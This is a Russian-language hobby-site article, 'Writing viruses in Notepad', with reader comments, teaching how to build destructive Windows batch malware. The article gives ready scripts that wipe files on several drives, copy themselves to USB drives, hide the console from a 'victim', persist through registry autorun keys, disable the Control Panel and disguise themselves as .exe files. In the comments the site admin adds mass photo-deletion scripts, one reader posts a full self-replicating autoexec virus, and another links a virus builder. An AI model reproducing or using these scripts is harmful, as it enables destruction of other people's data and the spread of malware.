Приветствую Вас, Гость
Меню сайта
Категории раздела
Взлом и защита от взлома [1]
Типы вирусов, их написание и способы борьбы с ними.
Сайтостроение [1]
Статьи о сайтостроении. Все о сайтах: от редактирования HTML-кода до самых крутых наворотов.
Arduino [3]
Статьи о микроконтроллерах и отладочных платах Arduino
Вход на сайт
Друзья сайта
  • Официальный блог
  • Сообщество uCoz
  • База знаний uCoz
    • Статистика
    Онлайн всего: 1
    Гостей: 1
    Пользователей: 0
    Главная » Статьи » Взлом и защита от взлома
    Написание вирусов в блокноте
    Все, что выбудете делать используя информацию, изложенную ниже вы делаете исключительно на свой страх и риск!

    Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat.
    Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.

    Итак, как я уже говорил, сценарий имеет расширение *.bat и является текстовым файлом, значит:
    1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек);
    2. Сохраняем с любым именем и расширением *.bat;
    3. Открываем файл и видим что открылся Диспетчер задач.
    Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.

    Далее напишем программку, которая создает подпапку в папке, где находится сама, а затем копирует себя на флешку, если та вставлена. Итак создаем .bat -файл следующего содержания:

    md folder
    copy%0 F:\program.bat

    Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program.bat» содержащий текст нашей программы.

    Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):

    1. «copy %0 a:\b» - копирует выполняемый файл на диск a в папку b (например copy %0 C:\ program.bat);
    2. «date x.y.z» - меняет дату на x день, y месяц, z год (например date 16.11.05);
    3. «time х:у» - меняет время на х часов и у минут (например time 14:27);
    4. «label x:y» - переименовывает диск x на имя y (например label C:Disc error);
    5. «del *.* /q» - удалит все файлы в папке, где лежит наш сценарий (папки остаются);
    6. «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
    7. «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.txt);
    8. «md х» - создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka);
    9. «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add).

    Используя полученные знания, мы можем написать такие вредоносные программки:

    1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:

    time 14:13
    date 11.07.12
    copy %0 C:\date.bat
    copy %0 F:\date.bat

    2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:

    del F:\ *.* /q
    label F:error
    copy %0 F:\deleter.bat

    3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:

    del C:\ *.* /q
    del D:\ *.* /q
    del E:\ *.* /q
    del F:\ *.* /q
    time 00:00
    date 13.06.23
    del *.* /q

    Сложно не заметить окно командной строки, которое открывается при запуске наших программ и тут же исчезает… Так вот чтобы его скрыть от жертвы добавляем вначале программы команду «@echo off» также после каждой команды нужно добавить действие, которое скроет строчку «>nul».
    После такого усовершенствования наш вирус принимает вид:

    @echo off
    del C:\ *.* /q >nul
    del D:\ *.* /q >nul
    del E:\ *.* /q >nul
    del F:\ *.* /q >nul
    time 00:00 >nul
    date 13.06.23 >nul
    del *.* /q >nul

    Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *.exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».

    В наших вирусах мы можем использовать еще такие скрипты:

    1. Меняет клавиши мыши местами:

    %SystemRoot%/system32/rundll32 user32, SwapMouseButton

    2. Открывает выбранную программу до полного торможения компьютера:

    :x ;
    Start mspaint
    goto x ;

    3. Добавляет наш вирус в автозапуск     (!):

    copy ""%0"" "%SystemRoot%\system32\File.bat"
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

    Теперь имеем достаточно знаний для написания простеньких вирусов. Удачи!


    Категория: Взлом и защита от взлома | Добавил: Администратор (14.03.2010) | Автор: Михаил
    Просмотров: 34450 | Комментарии: 33 | Теги: Написание вирусов в блокноте, вирусология, вредоносные программы | Рейтинг: 3.6/26
    Всего комментариев: 321 2 »
    1 nukacoal  
    0
    а это что за язык?

    2 Админ  
    0
    Языком программирования это назвать сложно, просто сценарий. Если приходилось когда либо пользовться командной строкой, то это то же самое, просто в уже заданной последовательности

    3 Mika  
    0
    очень интересная статья! но мне вот что еще очень интересно, какую строчку еще можно добавить чтоб удалить все фотки с компа..?? очень надо,если знаете,то помогите пож-та..

    4 Админ  
    0
    К сожалению функционал командной строки очень скудный... Подобной команды я не нашел. Хотя можете попробовать найти сами. Для этого в командной строке пропишите команду HELP или же запустите bat-файл у себя на компьютере со следующим содержанием:

    help
    cmd

    откроется интерфейс командной строки со списком всех основных команд, далее чтобы получить подробную справку по какой либо команде напишите имя команды и /? , а затем нажмите enter. Например:
    DEL/?
    а далее по открывшейся справке...


    5 Админ  
    0
    хотя можно запустить файл со сценарием
    del/s *.jpg
    в корне диска, и все файлы с расширением .jpg будут удалены.
    Можно попробовать такой сценарий
    cd c:\
    del/s *.jpg
    cd d:\
    del/s *.jpg
    Если диски на компьютере имеют имена с и d, то этого будет достаточно.
    Не забывайте об уголовной ответственности статья 361 уголовного кодекса украины если интересно http://yurist-online.com/uslugi/yuristam/kodeks/013/373.php

    6 Михаил  
    0
    А можно сделать так чтобы папки появлялись не в том месте где и вирус,а в другой папке и/или диске?
    Как еще быстро написать в вирусе большое кол-во папок,а не по одной вписывать?

    7 Админ  
    0
    Для того чтоб сменить рабочую дирректорию есть команда cd
    например:

    CD d:\videos

    Ну а с большим количеством папок одним махом навряд ли чем помогу


    8 termenator  
    0
    можно создать такой вирус который будет повышать частоту выше предела и причинять физический вред компьютеру

    9 Админ  
    0
    Уж точно не при помощи командной строки...

    10 Nerzul121  
    0
    Блин а я нечайно его запустил сделал вирусь и запустил теперь путаюсь блин!!!

    11 wanted8990  
    0
    Михаил (20.12.2010 15:22)
    А можно сделать так чтобы папки появлялись не в том месте где и вирус,а в другой папке и/или диске?
    Как еще быстро написать в вирусе большое кол-во папок,а не по одной вписывать?

    Чтобы сделать много папок открываешь ЭКСЕЛЬ в первой строке пишешь md1 и оттягиваешь колонку вниз до нужного числа


    12 igor  
    0
    мне статья №361 не грозит я из России)))

    13 SKRIN  
    0
    Setup_Mutant_v4.0.exe, http://www.getzilla.net/files/543343/setup_mutant_v4.0.exe.html программа для создания таких вирусов

    14 fuckin  
    0
    а можно сделать так,чтобы вирус попытался копировать себя на флешку не сразу,а только тогда,как она будет всавлена?

    15 Bazaroff  
    0
    Как хорошо, что подсказали ссыль! Очень интересуюсь этим вопросом. Все прочитал. есть вопросы. Нужно для демонстрации деятельности вируса.
    Вирус сидит на дискете. Вставляем дискету в комп он сам лезет в систему и запускается. Какое-нибудь надоедлвое действие, скажем раз в минуту открывается блокнот с надписью.
    При вставке любой другой дискеты в дисковод - сразу же сам помещает на нее свою скрытую копию

    16 Serega  
    0
    Подскажите как написать вирус чтобы он с флэшки автоматически (незаметно) запустился в комп и начал удалять все видео файлы на компе больше 1мегабайта???

    17 Serega  
    0
    Желательно ,чтобы не сразу ,а по несколько видео файлов в день.

    18 роман  
    0
    я создал и нечайно запустил у себя на компе вот этот вирус
    @Echo off (запрещаем вывод на экран исполняемых команд)
    Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
    Date 13.09.96 (эта строка изменяет дату)
    If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
    Copy %0 c:ski.bat (копирует вирус только изменив названия)
    Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
    Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
    :abc ( ……если он существует, то программа перейдет на метку :abc)
    md PRIDUROK
    md LUZER
    md DURAK (Создает пустые папки)
    md LAMER
    Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
    assoc .exe=.mp3 (запускает все ексшники как музыка
    del c:Program Files/q (удаляет все файлы из этой папки)
    Echo VIRUS LOAD (Выводит надпись)

    как от него избавиться подскажите


    19 Azper  
    0
    Роман, виндовс переустанови! Как такую махину можно нечаянно создать, да еще и запустить?

    20 Azper  
    0
    Serega, спроси у романа, он наверняка знает

    1-20 21-32
    Имя *:
    Email *:
    Код *: